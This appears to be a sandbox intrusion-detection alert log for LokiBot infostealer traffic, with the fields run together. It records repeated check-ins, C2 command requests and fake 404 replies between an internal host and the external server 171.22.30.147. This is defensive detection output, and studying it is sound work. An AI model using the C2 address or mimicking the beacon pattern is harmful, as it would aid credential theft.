              192.168.2.3171.22.30.14749956802024318 01/05/23-08:53:26.250117TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24995680192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750039802021641 01/05/23-08:53:51.865723TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5003980192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750056802825766 01/05/23-08:53:56.463023TCP2825766ETPRO TROJAN LokiBot Checkin M25005680192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749913802024313 01/05/23-08:53:14.593137TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14991380192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380497992025483 01/05/23-08:52:40.916842TCP2025483ET TROJAN LokiBot Fake 404 Response8049799171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749942802025381 01/05/23-08:53:22.441601TCP2025381ET TROJAN LokiBot Checkin4994280192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380499452025483 01/05/23-08:53:23.362979TCP2025483ET TROJAN LokiBot Fake 404 Response8049945171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749827802021641 01/05/23-08:52:48.461129TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4982780192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749861802024313 01/05/23-08:52:59.149010TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14986180192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749764802025381 01/05/23-08:52:29.472789TCP2025381ET TROJAN LokiBot Checkin4976480192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750013802825766 01/05/23-08:53:43.455950TCP2825766ETPRO TROJAN LokiBot Checkin M25001380192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380498962025483 01/05/23-08:53:08.839540TCP2025483ET TROJAN LokiBot Fake 404 Response8049896171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749923802024318 01/05/23-08:53:17.329996TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24992380192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749946802024313 01/05/23-08:53:23.547730TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14994680192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749721802025381 01/05/23-08:52:17.231128TCP2025381ET TROJAN LokiBot Checkin4972180192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749738802825766 01/05/23-08:52:22.066688TCP2825766ETPRO TROJAN LokiBot Checkin M24973880192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750029802021641 01/05/23-08:53:49.112211TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5002980192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749946802024318 01/05/23-08:53:23.547730TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24994680192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749851802024313 01/05/23-08:52:56.435777TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985180192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749837802021641 01/05/23-08:52:51.988001TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4983780192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380498592025483 01/05/23-08:52:58.704392TCP2025483ET TROJAN LokiBot Fake 404 Response8049859171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14750003802025381 01/05/23-08:53:40.763519TCP2025381ET TROJAN LokiBot Checkin5000380192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750006802021641 01/05/23-08:53:41.552586TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5000680192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380497222025483 01/05/23-08:52:17.587572TCP2025483ET TROJAN LokiBot Fake 404 Response8049722171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749851802024318 01/05/23-08:52:56.435777TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24985180192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749916802825766 01/05/23-08:53:15.372296TCP2825766ETPRO TROJAN LokiBot Checkin M24991680192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749732802021641 01/05/23-08:52:20.401546TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4973280192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749979802024313 01/05/23-08:53:34.430839TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14997980192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380497112025483 01/05/23-08:52:12.140154TCP2025483ET TROJAN LokiBot Fake 404 Response8049711171.22.30.147192.168.2.3
              171.22.30.147192.168.2.380498482025483 01/05/23-08:52:55.724943TCP2025483ET TROJAN LokiBot Fake 404 Response8049848171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749992802024313 01/05/23-08:53:37.885447TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14999280192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380500642025483 01/05/23-08:53:58.673182TCP2025483ET TROJAN LokiBot Fake 404 Response8050064171.22.30.147192.168.2.3
              171.22.30.147192.168.2.380500532025483 01/05/23-08:53:55.718019TCP2025483ET TROJAN LokiBot Fake 404 Response8050053171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749956802024313 01/05/23-08:53:26.250117TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14995680192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749850802021641 01/05/23-08:52:56.172529TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4985080192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749797802825766 01/05/23-08:52:40.255110TCP2825766ETPRO TROJAN LokiBot Checkin M24979780192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749774802825766 01/05/23-08:52:32.369884TCP2825766ETPRO TROJAN LokiBot Checkin M24977480192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749992802024318 01/05/23-08:53:37.885447TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24999280192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749936802024313 01/05/23-08:53:20.832811TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14993680192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750019802021641 01/05/23-08:53:45.311637TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5001980192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749933802024318 01/05/23-08:53:20.043516TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24993380192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749758802024313 01/05/23-08:52:27.765970TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975880192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750003802825766 01/05/23-08:53:40.763519TCP2825766ETPRO TROJAN LokiBot Checkin M25000380192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750053802024318 01/05/23-08:53:55.636070TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25005380192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749893802021641 01/05/23-08:53:07.754435TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4989380192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380499562025483 01/05/23-08:53:26.337856TCP2025483ET TROJAN LokiBot Fake 404 Response8049956171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749979802024318 01/05/23-08:53:34.430839TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24997980192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750053802024313 01/05/23-08:53:55.636070TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15005380192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380499342025483 01/05/23-08:53:20.381423TCP2025483ET TROJAN LokiBot Fake 404 Response8049934171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749966802024313 01/05/23-08:53:30.946864TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14996680192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749969802024313 01/05/23-08:53:31.782144TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14996980192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750043802024313 01/05/23-08:53:52.949985TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15004380192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750072802025381 01/05/23-08:54:00.683642TCP2025381ET TROJAN LokiBot Checkin5007280192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749784802825766 01/05/23-08:52:36.673037TCP2825766ETPRO TROJAN LokiBot Checkin M24978480192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749744802025381 01/05/23-08:52:23.736699TCP2025381ET TROJAN LokiBot Checkin4974480192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749821802825766 01/05/23-08:52:46.829983TCP2825766ETPRO TROJAN LokiBot Checkin M24982180192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749952802025381 01/05/23-08:53:25.200806TCP2025381ET TROJAN LokiBot Checkin4995280192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750033802825766 01/05/23-08:53:50.199257TCP2825766ETPRO TROJAN LokiBot Checkin M25003380192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749978802021641 01/05/23-08:53:34.155329TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4997880192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749705802825766 01/05/23-08:52:09.363911TCP2825766ETPRO TROJAN LokiBot Checkin M24970580192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749777802025381 01/05/23-08:52:34.550245TCP2025381ET TROJAN LokiBot Checkin4977780192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749923802024313 01/05/23-08:53:17.329996TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14992380192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749860802021641 01/05/23-08:52:58.886735TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4986080192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749966802024318 01/05/23-08:53:30.946864TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24996680192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749708802025381 01/05/23-08:52:10.789251TCP2025381ET TROJAN LokiBot Checkin4970880192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750058802025381 01/05/23-08:53:57.002594TCP2025381ET TROJAN LokiBot Checkin5005880192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749758802024318 01/05/23-08:52:27.765970TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24975880192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749926802825766 01/05/23-08:53:18.143087TCP2825766ETPRO TROJAN LokiBot Checkin M24992680192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749731802025381 01/05/23-08:52:20.113614TCP2025381ET TROJAN LokiBot Checkin4973180192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750000802825766 01/05/23-08:53:39.996140TCP2825766ETPRO TROJAN LokiBot Checkin M25000080192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749860802825766 01/05/23-08:52:58.886735TCP2825766ETPRO TROJAN LokiBot Checkin M24986080192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749718802825766 01/05/23-08:52:15.464089TCP2825766ETPRO TROJAN LokiBot Checkin M24971880192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750046802825766 01/05/23-08:53:53.748051TCP2825766ETPRO TROJAN LokiBot Checkin M25004680192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749849802025381 01/05/23-08:52:55.895226TCP2025381ET TROJAN LokiBot Checkin4984980192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749889802825766 01/05/23-08:53:06.674333TCP2825766ETPRO TROJAN LokiBot Checkin M24988980192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749936802024318 01/05/23-08:53:20.832811TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24993680192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749767802025381 01/05/23-08:52:30.299348TCP2025381ET TROJAN LokiBot Checkin4976780192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380500082025483 01/05/23-08:53:42.185814TCP2025483ET TROJAN LokiBot Fake 404 Response8050008171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749775802024313 01/05/23-08:52:32.683406TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977580192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749988802825766 01/05/23-08:53:36.817903TCP2825766ETPRO TROJAN LokiBot Checkin M24998880192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749982802825766 01/05/23-08:53:35.215314TCP2825766ETPRO TROJAN LokiBot Checkin M24998280192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749775802024318 01/05/23-08:52:32.683406TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977580192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749893802825766 01/05/23-08:53:07.754435TCP2825766ETPRO TROJAN LokiBot Checkin M24989380192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749870802021641 01/05/23-08:53:01.561418TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4987080192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749903802825766 01/05/23-08:53:11.877542TCP2825766ETPRO TROJAN LokiBot Checkin M24990380192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750066802024313 01/05/23-08:53:59.096230TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15006680192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750076802024318 01/05/23-08:54:01.789357TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25007680192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749742802024318 01/05/23-08:52:23.189713TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24974280192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380497772025483 01/05/23-08:52:34.636579TCP2025483ET TROJAN LokiBot Fake 404 Response8049777171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749919802021641 01/05/23-08:53:16.188265TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4991980192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749742802024313 01/05/23-08:52:23.189713TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14974280192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380497442025483 01/05/23-08:52:23.820398TCP2025483ET TROJAN LokiBot Fake 404 Response8049744171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749880802021641 01/05/23-08:53:04.232334TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4988080192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749975802021641 01/05/23-08:53:33.363507TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4997580192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749804802825766 01/05/23-08:52:42.167879TCP2825766ETPRO TROJAN LokiBot Checkin M24980480192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380497332025483 01/05/23-08:52:20.762776TCP2025483ET TROJAN LokiBot Fake 404 Response8049733171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749969802024318 01/05/23-08:53:31.782144TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24996980192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750076802024313 01/05/23-08:54:01.789357TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15007680192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749998802021641 01/05/23-08:53:39.461942TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4999880192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749903802021641 01/05/23-08:53:11.877542TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4990380192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749814802021641 01/05/23-08:52:44.953030TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4981480192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750068802025381 01/05/23-08:53:59.646284TCP2025381ET TROJAN LokiBot Checkin5006880192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750062802025381 01/05/23-08:53:58.073723TCP2025381ET TROJAN LokiBot Checkin5006280192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750066802024318 01/05/23-08:53:59.096230TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25006680192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380498372025483 01/05/23-08:52:52.073871TCP2025483ET TROJAN LokiBot Fake 404 Response8049837171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749909802021641 01/05/23-08:53:13.489642TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4990980192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749933802024313 01/05/23-08:53:20.043516TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14993380192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749841802024313 01/05/23-08:52:53.743125TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14984180192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749899802021641 01/05/23-08:53:10.169881TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4989980192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380499902025483 01/05/23-08:53:37.463055TCP2025483ET TROJAN LokiBot Fake 404 Response8049990171.22.30.147192.168.2.3
              171.22.30.147192.168.2.380498262025483 01/05/23-08:52:48.269953TCP2025483ET TROJAN LokiBot Fake 404 Response8049826171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749988802021641 01/05/23-08:53:36.817903TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4998880192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380500192025483 01/05/23-08:53:45.393441TCP2025483ET TROJAN LokiBot Fake 404 Response8050019171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749841802024318 01/05/23-08:52:53.743125TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24984180192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380497882025483 01/05/23-08:52:37.863351TCP2025483ET TROJAN LokiBot Fake 404 Response8049788171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749830802025381 01/05/23-08:52:49.252221TCP2025381ET TROJAN LokiBot Checkin4983080192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380498092025483 01/05/23-08:52:43.678579TCP2025483ET TROJAN LokiBot Fake 404 Response8049809171.22.30.147192.168.2.3
              171.22.30.147192.168.2.380497662025483 01/05/23-08:52:30.097797TCP2025483ET TROJAN LokiBot Fake 404 Response8049766171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749804802021641 01/05/23-08:52:42.167879TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4980480192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749715802021641 01/05/23-08:52:14.021138TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4971580192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750078802025381 01/05/23-08:54:02.320663TCP2025381ET TROJAN LokiBot Checkin5007880192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749857802024318 01/05/23-08:52:58.054307TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24985780192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750036802825766 01/05/23-08:53:51.046851TCP2825766ETPRO TROJAN LokiBot Checkin M25003680192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749883802021641 01/05/23-08:53:05.037332TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4988380192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749857802024313 01/05/23-08:52:58.054307TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14985780192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749843802025381 01/05/23-08:52:54.266621TCP2025381ET TROJAN LokiBot Checkin4984380192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749794802021641 01/05/23-08:52:39.439392TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4979480192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749754802025381 01/05/23-08:52:26.655822TCP2025381ET TROJAN LokiBot Checkin4975480192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749972802825766 01/05/23-08:53:32.566966TCP2825766ETPRO TROJAN LokiBot Checkin M24997280192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749883802825766 01/05/23-08:53:05.037332TCP2825766ETPRO TROJAN LokiBot Checkin M24988380192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749794802825766 01/05/23-08:52:39.439392TCP2825766ETPRO TROJAN LokiBot Checkin M24979480192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749752802024318 01/05/23-08:52:26.039085TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24975280192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749752802024313 01/05/23-08:52:26.039085TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14975280192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749728802021641 01/05/23-08:52:19.268418TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4972880192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750010802021641 01/05/23-08:53:42.643021TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5001080192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750023802825766 01/05/23-08:53:47.546596TCP2825766ETPRO TROJAN LokiBot Checkin M25002380192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749867802024318 01/05/23-08:53:00.773467TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24986780192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749806802024318 01/05/23-08:52:42.779655TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24980680192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749951802025381 01/05/23-08:53:24.927407TCP2025381ET TROJAN LokiBot Checkin4995180192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749711802024313 01/05/23-08:52:12.061796TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14971180192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749772802024318 01/05/23-08:52:31.644906TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24977280192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380498152025483 01/05/23-08:52:45.296277TCP2025483ET TROJAN LokiBot Fake 404 Response8049815171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749711802024318 01/05/23-08:52:12.061796TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24971180192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749806802024313 01/05/23-08:52:42.779655TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14980680192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749864802021641 01/05/23-08:52:59.960618TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4986480192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380497982025483 01/05/23-08:52:40.632649TCP2025483ET TROJAN LokiBot Fake 404 Response8049798171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749772802024313 01/05/23-08:52:31.644906TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14977280192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749727802025381 01/05/23-08:52:18.985108TCP2025381ET TROJAN LokiBot Checkin4972780192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749788802025381 01/05/23-08:52:37.784136TCP2025381ET TROJAN LokiBot Checkin4978880192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749895802024318 01/05/23-08:53:08.372653TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24989580192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750055802025381 01/05/23-08:53:56.183544TCP2025381ET TROJAN LokiBot Checkin5005580192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750011802024313 01/05/23-08:53:42.925761TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15001180192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380497572025483 01/05/23-08:52:27.578914TCP2025483ET TROJAN LokiBot Fake 404 Response8049757171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749895802024313 01/05/23-08:53:08.372653TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14989580192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749987802021641 01/05/23-08:53:36.549688TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4998780192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749834802024318 01/05/23-08:52:50.512718TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24983480192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749868802825766 01/05/23-08:53:01.029018TCP2825766ETPRO TROJAN LokiBot Checkin M24986880192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749722802025381 01/05/23-08:52:17.506386TCP2025381ET TROJAN LokiBot Checkin4972280192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749773802825766 01/05/23-08:52:31.909319TCP2825766ETPRO TROJAN LokiBot Checkin M24977380192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749986802825766 01/05/23-08:53:36.285692TCP2825766ETPRO TROJAN LokiBot Checkin M24998680192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750027802025381 01/05/23-08:53:48.599181TCP2025381ET TROJAN LokiBot Checkin5002780192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749892802021641 01/05/23-08:53:07.470439TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4989280192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749923802025381 01/05/23-08:53:17.329996TCP2025381ET TROJAN LokiBot Checkin4992380192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750050802025381 01/05/23-08:53:54.799294TCP2025381ET TROJAN LokiBot Checkin5005080192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749867802024313 01/05/23-08:53:00.773467TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14986780192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749817802025381 01/05/23-08:52:45.747633TCP2025381ET TROJAN LokiBot Checkin4981780192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749803802021641 01/05/23-08:52:41.905218TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4980380192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380499742025483 01/05/23-08:53:33.180561TCP2025483ET TROJAN LokiBot Fake 404 Response8049974171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14750074802021641 01/05/23-08:54:01.233569TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5007480192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750024802825766 01/05/23-08:53:47.812882TCP2825766ETPRO TROJAN LokiBot Checkin M25002480192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749833802025381 01/05/23-08:52:50.090304TCP2025381ET TROJAN LokiBot Checkin4983380192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380500352025483 01/05/23-08:53:50.821138TCP2025483ET TROJAN LokiBot Fake 404 Response8050035171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749921802021641 01/05/23-08:53:16.794242TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4992180192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749982802021641 01/05/23-08:53:35.215314TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4998280192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750028802024313 01/05/23-08:53:48.853917TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15002880192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749728802024318 01/05/23-08:52:19.268418TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24972880192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380499552025483 01/05/23-08:53:26.069151TCP2025483ET TROJAN LokiBot Fake 404 Response8049955171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14750056802024318 01/05/23-08:53:56.463023TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25005680192.168.2.3171.22.30.147
              171.22.30.147192.168.2.380500132025483 01/05/23-08:53:43.537023TCP2025483ET TROJAN LokiBot Fake 404 Response8050013171.22.30.147192.168.2.3
              192.168.2.3171.22.30.14749912802024318 01/05/23-08:53:14.329479TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24991280192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749894802025381 01/05/23-08:53:08.006895TCP2025381ET TROJAN LokiBot Checkin4989480192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750028802024318 01/05/23-08:53:48.853917TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25002880192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750025802021641 01/05/23-08:53:48.086655TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5002580192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14749750802025381 01/05/23-08:52:25.450968TCP2025381ET TROJAN LokiBot Checkin4975080192.168.2.3171.22.30.147
              192.168.2.3171.22.30.14750039802025381 01/05/23-08:53:51.865723TCP2025381ET TROJAN LokiBot Checkin5003980192.168.2.3171.22.30.147
